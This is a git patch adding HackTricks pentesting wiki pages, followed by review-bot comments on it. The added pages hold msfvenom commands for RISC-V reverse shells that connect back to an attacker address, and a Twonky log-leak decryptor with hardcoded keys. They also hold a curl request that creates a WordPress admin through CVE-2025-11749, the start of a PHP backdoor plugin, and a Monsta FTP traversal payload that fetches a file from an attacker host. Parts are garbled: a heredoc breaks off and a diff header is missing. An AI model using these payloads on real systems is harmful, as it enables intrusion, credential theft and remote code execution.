From 1c394695b3ffde8945d9e9903a315483a97ac4fd Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 6 Dec 2025 01:38:19 +0000 Subject: [PATCH] Add content from: Metasploit Wrap-Up 12/05/2025 --- src/generic-hacking/reverse-shells/linux.md | 23 +++++++ src/pentesting-web/account-takeover.md | 74 +++++++++++++++++++++ src/pentesting-web/file-upload/README.md | 31 ++++++++- 3 files changed, 127 insertions(+), 1 deletion(-) diff --git a/src/generic-hacking/reverse-shells/linux.md b/src/generic-hacking/reverse-shells/linux.md index 8fed81905f1..2896cdc2f0a 100644 --- a/src/generic-hacking/reverse-shells/linux.md +++ b/src/generic-hacking/reverse-shells/linux.md 
@@ -420,6 +420,28 @@ String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` +## RISC-V inline reverse TCP shells + +Metasploit 6.4.101 introduced single-stage reverse shells for both little-endian RISC-V architectures. `linux/riscv32le/shell_reverse_tcp` and `linux/riscv64le/shell_reverse_tcp` are position-independent shellcodes that open a TCP connection back to your handler, `dup2` the socket over stdin/stdout/stderr and `execve("/bin/sh")`—making them perfect droppers for memory-corruption exploits on emerging RISC-V appliances. + +Generate artifacts directly from msfvenom: + +```bash +msfvenom -p linux/riscv64le/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell_rv64 +msfvenom -p linux/riscv32le/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f hex | sed 's/../\\x&/g' +``` + +The second command emits escaped shellcode bytes you can drop into a ROP chain. If you need a traditional handler: + +```text +msfconsole > use exploit/multi/handler +msfconsole > set payload linux/riscv64le/shell_reverse_tcp +msfconsole > set LHOST 10.10.14.1 +msfconsole > run +``` + +Because the payloads are inline, no staging channel or filesystem write is required—just copy the bytes into your exploit buffer and trigger execution on the correct RISC-V bitness. + ## References - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) 
@@ -428,5 +450,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - [https://github.com/robiot/rustcat](https://github.com/robiot/rustcat) - [https://github.com/emptymonkey/revsh](https://github.com/emptymonkey/revsh) +- [Rapid7 – Metasploit Wrap-Up 12/05/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md index 9e9169fb8b2..ab6886393f3 100644 --- a/src/pentesting-web/account-takeover.md +++ b/src/pentesting-web/account-takeover.md 
@@ -149,10 +149,84 @@ This also happened in [**this report**](https://dynnyd20.medium.com/one-click-ac As explained [**in this post**](https://medium.com/@niraj1mahajan/uncovering-the-hidden-vulnerability-how-i-found-an-authentication-bypass-on-shopifys-exchange-cc2729ea31a9), it was possible to login into an account, save the cookies as an authenticated user, logout, and then login again.\ With the new login, although different cookies might be generated the old ones became to work again. +## Twonky Server log leak → administrator takeover (CVE-2025-13315/CVE-2025-13316) + +Twonky Server 8.5.2 exposes its maintenance logs via `/nmc/rpc/log_getfile` without authentication and logs the last successful administrator login as `accessuser=` followed by an encrypted password field (`||`). Because the encryption keys are static, the leak becomes an admin credential recovery primitive: + +1. **Fingerprint the build** with an unauthenticated `GET /dev0/desc.xml` request and confirm `8.5.2` is returned. +2. **Download the logs** with `GET /nmc/rpc/log_getfile` and parse the newest `accessuser` entry plus the trailing `||` encrypted blob. +3. **Extract the key selector** (the nibble immediately following `||`) and the remainder of the ciphertext. The nibble indexes one of twelve hardcoded Blowfish keys compiled into Twonky. +4. **Decrypt the password** locally and strip trailing null bytes. Twonky stores the credentials as plaintext after the Blowfish operation, so no extra hashing is present. +5. **Log in as admin** over HTTP with the recovered username/password pair to reach all media-server management endpoints. + +Typical request to retrieve the leaked logs: + +```http +GET /nmc/rpc/log_getfile HTTP/1.1 +Host: twonky:9000 +``` + +### Decrypting the leaked password + +
+Python Blowfish decryptor + +```python +from Crypto.Cipher import Blowfish + +STATIC_KEYS = [ + "E8ctd4jZwMbaV587", "TGFWfWuW3cw28trN", "pgqYY2g9atVpTzjY", "KX7q4gmQvWtA8878", + "VJjh7ujyT8R5bR39", "ZMWkaLp9bKyV6tXv", "KMLvvq6my7uKkpxf", "jwEkNvuwYCjsDzf5", + "FukE5DhdsbCjuKay", "SpKNj6qYQGjuGMdd", "qLyXuAHPTF2cPGWj", "rKz7NBhM3vYg85mg" +] + +ciphertext = bytes.fromhex(enc_pwd) +key = STATIC_KEYS[int(enc_key_index, 16)] +plain = Blowfish.new(key.encode(), Blowfish.MODE_ECB).decrypt(ciphertext) +print(plain.rstrip(b"\x00").decode()) +``` + +
+ +## WordPress AI Engine MCP unauthenticated admin creation (CVE-2025-11749) + +The AI Engine plugin exposes a Model Context Protocol (MCP) API under `/wp-json/mcp/v1//` that maps JSON-RPC calls directly to privileged WordPress functions. Versions ≤3.1.3 never check authentication, so an attacker can mint an admin account and then abuse the normal plugin-upload workflow for RCE: + +1. **Enumerate the MCP token** by fetching `/wp-json/` (or `/?rest_route=/`) and parsing the routes for `/mcp/v1//sse`. +2. **Create or update an administrator** by POSTing a JSON-RPC request to `/wp-json/mcp/v1//sse` where `method` is `tools/call`, `params.name` is `wp_create_user` (or `wp_update_user`), and the arguments contain attacker-controlled credentials. +3. **Log in to `/wp-admin/`** with the freshly provisioned account and reuse Plugins → Add New → Upload Plugin to deploy a PHP backdoor. +4. **Activate the plugin** or directly browse to its endpoint to execute commands as the web server user. + +Unauthenticated admin creation: + +```bash +curl -k -X POST https://target/wp-json/mcp/v1//sse \ + -H 'Content-Type: application/json' \ + -d '{"jsonrpc":"2.0","id":1337,"method":"tools/call","params":{"name":"wp_create_user","arguments":{"user_login":"aiadmin","user_pass":"Passw0rd!","user_email":"attacker@example.com","role":"administrator"}}}' +``` + +Minimal malicious plugin packaging and upload: + +```bash +mkdir ai-shell +cat <<'PHP' > ai-shell/ai-shell.php +.php` under the Monsta install) so the payload is written with executable permissions. +4. After Monsta reports success, request the uploaded file over HTTP to execute commands as the web server user. 
+ +The JSON structure embedded in the `request=` body looks like: + +```json +{ + "connectionType": "ftp", + "configuration": { + "host": "10.10.14.2", + "username": "pwn", + "password": "pwn", + "port": 2121 + }, + "actionName": "downloadFile", + "context": { + "remotePath": "/payload.php", + "localPath": "../application/api/avatars/evil.php" + } +} +``` + ## References - [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/) - - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files) - [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner) - [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider) @@ -546,5 +573,7 @@ How to avoid file type detections by uploading a valid JSON file even if not all - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink) - [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html) +- [Rapid7 – Metasploit Wrap-Up 12/05/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025/) +- [Metasploit module: multi/http/monsta_ftp_downloadfile_rce](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb) {{#include ../../banners/hacktricks-training.md}}
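Review bot: the `sed 's/../\\x&/g'` step in the second msfvenom command of the RISC-V hunk (`@@ -420,6 +420,28 @@` in `linux.md`) produces a string that is only meaningful where `\x` escapes are interpreted, and the surrounding sentence does not say which string context it is meant for; msfvenom's `-f c` and `-f python` formats already emit escaped byte strings, so either use one of those or state the intended context. Two smaller points in the same hunk: "both little-endian RISC-V architectures" should say 32-bit and 64-bit explicitly, since that is what the two payload names encode, and the `text` block prefixes each command with `msfconsole >`, a prompt the tool does not print (current releases show `msf6 >`); use the real prompt or drop the prefix so the four lines can be pasted as-is.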
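Review bot: the new reference entry in the `linux.md` `@@ -428,5 +450,6 @@` hunk is the only item in that list whose link text is a title ("Rapid7 – Metasploit Wrap-Up 12/05/2025") rather than the bare URL used by every neighbouring entry; match the list's existing convention or convert the whole list, not one item. Consider also linking the two payload modules in the metasploit-framework repository next to the wrap-up post, since the wrap-up covers many unrelated changes and the 6.4.101 version claim in the new section rests on it.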
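Review bot: the Python decryptor in the `account-takeover.md` hunk (`@@ -149,10 +149,84 @@`) uses `enc_pwd` and `enc_key_index` without ever assigning them, so it raises NameError as written; declare both with a comment saying they are the hex blob and the key-selector nibble parsed in steps 2 and 3, and name the dependency (`from Crypto.Cipher import Blowfish` is the pycryptodome API). The "Python Blowfish decryptor" summary line appears with no enclosing `<details>`/`<summary>` markup in the visible hunk; if that markup is missing from the committed file, mdBook renders it as a bare line. In the AI Engine section the route is written `/wp-json/mcp/v1//sse` with a doubled slash in the prose, the step list and the curl command; the token that step 1 says to enumerate belongs between those slashes, so put an explicit placeholder such as `{token}` there, otherwise it reads as a typo. The hunk also ends mid-heredoc after `cat <<'PHP' > ai-shell/ai-shell.php`, and the `diff --git` header for `src/pentesting-web/file-upload/README.md` that the diffstat promises never appears, so the patch as shown runs the two files together; check that the committed file is intact. Finally, both CVE sections give the vulnerable versions (Twonky 8.5.2, AI Engine ≤3.1.3) but not the fixed releases; add them if the referenced wrap-up names them.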
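Review bot: the Monsta step in the `file-upload/README.md` hunk that ends "so the payload is written with executable permissions" is misleading: the JSON that follows only sets `localPath`, and nothing in the request controls file mode bits; what step 4 actually relies on is that the destination directory is web-reachable and PHP is executed there, so say that instead. In the same JSON example `localPath` is a relative traversal (`../application/api/avatars/evil.php`); state what that path is resolved against, since the truncated step above only says "under the Monsta install". This hunk's own `diff --git`/`@@` header is absent from the patch as shown (the diffstat lists the file as its third entry), so its line counts cannot be checked.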
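Review bot: the new Metasploit module link in the `@@ -546,5 +573,7 @@` hunk points at the `master` branch, which moves; pin it to a commit or tag so the reference keeps resolving to the module version the section describes. The two `+` lines here cite both the wrap-up and the Monsta module, while the Twonky and AI Engine sections added to `account-takeover.md` in the same commit get only the wrap-up link; if module links are the convention, add the matching module links there as well.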